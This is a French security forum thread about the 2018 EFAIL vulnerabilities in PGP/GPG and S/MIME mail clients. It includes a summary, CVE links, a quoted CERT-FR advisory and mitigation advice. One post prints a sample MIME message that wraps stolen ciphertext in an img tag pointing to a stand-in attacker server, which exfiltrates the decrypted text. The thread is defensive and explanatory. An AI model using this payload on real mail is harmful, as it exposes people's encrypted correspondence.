#EFAIL : des vulnérabilités dans l'implémentation des protocoles PGP/GPG et S/Mime des clients mails

Toutes les mises à jour de sécurités publiées et les failles annoncées
Reprise notamment des publications du CERT-FR (ANSSI)
Répondre
Avatar du membre
charles
Administrateur du site
Messages : 3163
Enregistré le : 06 avr. 2015 09:02
Etablissement : CH Saint-Flour
Fonction : RSSI
CIL : Non
Site Internet de l'établissement : http://www.ch-stflour.fr
Site Internet personnel ou blog : http://www.forum-sih.fr
Contact :

#EFAIL : des vulnérabilités dans l'implémentation des protocoles PGP/GPG et S/Mime des clients mails

Message par charles » 14 mai 2018 13:10

L'EFF a confirmée (ce matin, pour nous Français) que les utilisateurs de PGP/GPG et S/MIME pourraient être affectés par des vulnérabilités critiques permettant de lire des messages chiffrés. Cette publication fait suite au tweet de Sebastian Schinzel.

Le papier exposant ces vulnérabilités devrait être publié demain matin (15/05/2018 à 07H00 UTC).
Pour le moment, une grande partie des articles que j'ai pu voir passer ne sont pas très clairs, je rejoins l'avis de Korben sur le sujet, car de ce que j'ai pu lire moi aussi dans une publication de la mailing list GnuPG, le protocole PGP/GPG ne serait pas affecté en lui même, mais ce serait plutôt l'implémentation qui en est faite dans les clients de messageries et les plugins qui poserait problème, en particulier pour le messages au format HTML.
Selon cette même publication, l'utilisation du chiffrement authentifié (Authenticated encryption ou AE) disponible dans GPG depuis le début des années 2000 résoudrait ce problème.
Il semblerait qu'il soit beaucoup plus difficile de corriger le problème pour l'implémentation de S/MIME et que la seule solution de contournement pour le moment serait de ne pas utiliser le format HTML dans les messages chiffrés.

Ces vulnérabilités permettraient donc d'accéder à l'ensemble des messages présents dans les clients de messageries dès lors que S/MIME et PGP/GPG est activé depuis le client ou via les plugins connus tels que Enigmail, Gpg4win ou encore GPGTools.
L'EFF recommande la désactivation de ces plugins permettant le déchiffrement "automatique" en attendant la publication de correctifs de sécurité et propose des guides permettant de réaliser cette action :

- Enigmail dans Thunderbird
- GPGTools dans Apple Mail
- Gpg4win dans Outlook

Attendons la suite...

Avatar du membre
charles
Administrateur du site
Messages : 3163
Enregistré le : 06 avr. 2015 09:02
Etablissement : CH Saint-Flour
Fonction : RSSI
CIL : Non
Site Internet de l'établissement : http://www.ch-stflour.fr
Site Internet personnel ou blog : http://www.forum-sih.fr
Contact :

Re: #EFAIL : des vulnérabilités dans l'implémentation des protocoles PGP/GPG et S/Mime des clients mails

Message par charles » 14 mai 2018 18:06

Le papier est finalement sorti plus tôt que prévu, je n'ai pas eu le temps de l'éplucher en détails (21 pages), mais vous pouvez le récupérer ici : https://efail.de/efail-attack-paper.pdf

Pour une explication plus minimaliste, vous pouvez consulter le site https://efail.de/

Si j'ai bien compris le fonctionnement, pour vulgariser, l'attaque se passerait ainsi :

overview2.jpg

Un attaquant accède à un message chiffré avec la clé publique de la victime.
Il récupère le contenu chiffré et l'insert dans une balise image qu'il découpe en 3 parties :

Code : Tout sélectionner

<img src="http://serveur-attaquant.xxx/
Contenu chiffré PGP/GPG ou S/MIME
">
Le client de messagerie déchiffre le contenu chiffré et émet une requête vers le serveur en lui envoyant le contenu désormais déchiffré.

Pour être plus exact, ça ressemblerait plutôt à ça :

Code : Tout sélectionner

[...]
Content-Type: multipart/mixed;boundary="BOUNDARY"
[...]
--BOUNDARY
Content-Type: text/html

<img src="http://attacker.chosen.url
--BOUNDARY
Content-Type: application/pkcs7-mime;
  s-mime-typed-envelope-data
Content-Transfer-Encoding: base64

ENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGE
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY
...
Le papier contient un tableau récapitulant les vulnérabilités par client de messagerie :

Image
Pour plus de détails sur l'attaque et notamment la partie CBC/CFB gadget attacks sur les deux protocoles : https://efail.de/

À noter : deux CVE ont été ouvertes :

https://cve.mitre.org/cgi-bin/cvename.c ... 2017-17688 (OpenPGP CFB gadget attacks)
https://cve.mitre.org/cgi-bin/cvename.c ... 2017-17689 (S/MIME CBC gadget attacks)

De là à dire que PGP/GPG est vulnérable comme on peut le lire dans certains articles est un peu exagéré... Le protocole n'a pas été cassé, mais via ingénierie sociale, il y a une possibilité d'attaque, mais il faut que l'attaquant ait volé un mail chiffré, qu'il vous envoie un mail intégrant ce contenu chiffré au format HTML dans un nouveau mail, et que vous déchiffriez son message pour qu'il puisse récupérer le contenu (texte uniquement). Ça fait quand même beaucoup, même si ce n'est pas à négliger.
Vous n’avez pas les permissions nécessaires pour voir les fichiers joints à ce message.

Avatar du membre
charles
Administrateur du site
Messages : 3163
Enregistré le : 06 avr. 2015 09:02
Etablissement : CH Saint-Flour
Fonction : RSSI
CIL : Non
Site Internet de l'établissement : http://www.ch-stflour.fr
Site Internet personnel ou blog : http://www.forum-sih.fr
Contact :

Re: #EFAIL : des vulnérabilités dans l'implémentation des protocoles PGP/GPG et S/Mime des clients mails

Message par charles » 15 mai 2018 07:33

Le CERT-FR a émis un avis sur le sujet :

https://www.cert.ssi.gouv.fr/alerte/CER ... 8-ALE-007/
CERT-FT a écrit :Résumé

Le 14 mai 2018, un site internet rendait disponible les détails d'une attaque baptisée EFAIL permettant de compromettre les échanges de courriels sécurisés par les mécanismes S/MIME et OpenPGP.

L'attaque permet à un acteur malveillant d'obtenir la version déchiffrée d'un message protégé par l'un des systèmes de chiffrement S/MIME ou OpenPGP. Pour cela l'attaquant doit être en position d'homme du milieu c'est à dire être capable de lire les échanges courriels entre un expéditeur et un destinataire.

Fuite de données et contenu actif


L'attaque décrite sous le nom de EFAIL tire parti de fonctionnalités des clients de messageries qui permettent d'enrichir le contenu textuel d'un courriel en intégrant du HTML ou encore du CSS. Ces éléments additionnels sont désignés comme contenu actif.
Un attaquant en mesure de modifier un courriel chiffré pourra ainsi utiliser certains éléments de ces langages pour réaliser des communications cachées vers l’extérieur, à l'issu du déchiffrement du message par le client de messagerie, en intégrant le contenu alors en clair.

Attaque cryptographique

Afin d'obtenir de façon direct le contenu en clair d'un message, les chercheurs présentant la vulnérabilité EFAIL exploitent certaines propriétés du chiffrement utilisés par S/MIME et OpenPGP afin de modifier le texte chiffré d'un message sans avoir besoin de disposer de clés cryptographiques. Ces manipulations auront pour objectif d'ajouter le contenu actif malveillant qui, une fois déchiffré, permettra de transmettre les données vers l'extérieur. Par exemple, un courriel modifié en début et fin afin d'inclure le message chiffré dans l'url de chargement d'une image pourra exfiltrer le contenu du courriel lorsque l'utilisateur visualisera les images du courriel.

D'autre part, il est à noter que la surface d'attaque est corrélée avec le nombre de destinataire d'une communication chiffrée. Ainsi, chaque destinataire d'un courriel pourra être la cible d'une attaque suivant le principe d'EFAIL.
Limitations

Bien que l'attaque EFAIL mette à mal le paradigme d'une communication sécurisée de bout-en-bout, les cas d'exploitation ne sont pas facilement accessibles.

L'attaquant doit accéder aux mails chiffrés soit lors d'une interception d'un trafic réseau local ou via Internet soit en disposant d'accès à un serveur de relais de messagerie. En fonction du scénario l'attaquant pourra dans certains cas bloquer temporairement le mail et le modifier soit de le copier lors de son transit et le rejouer vers la victime une fois altéré.


Contournement provisoire


Le CERT-FR recommande d'appliquer les correctifs fournis par les éditeurs de client de messagerie.

Suivant le délai de mise à disposition de correctifs par les éditeurs, le CERT-FR recommande également l'application des mesures temporaires suivantes.

- Désactiver l'utilisation du contenu actif dans le client de messagerie (HTML, CSS).
- Utiliser une application indépendante du client de messagerie pour pratiquer les opérations de chiffrement et de déchiffrement des courriels. Ces actions peuvent de plus être réalisés dans un environnement distinct et déconnecté du réseau.

Avatar du membre
charles
Administrateur du site
Messages : 3163
Enregistré le : 06 avr. 2015 09:02
Etablissement : CH Saint-Flour
Fonction : RSSI
CIL : Non
Site Internet de l'établissement : http://www.ch-stflour.fr
Site Internet personnel ou blog : http://www.forum-sih.fr
Contact :

Re: #EFAIL : des vulnérabilités dans l'implémentation des protocoles PGP/GPG et S/Mime des clients mails

Message par charles » 20 mai 2018 20:54

Thunderbird et Enigmail ont apporté des correctifs :

viewtopic.php?f=78&t=96&p=3647#p3647

viewtopic.php?f=78&t=992&p=3646#p3646

Répondre

Retourner vers « Alertes de sécurité - Mises à jour et failles »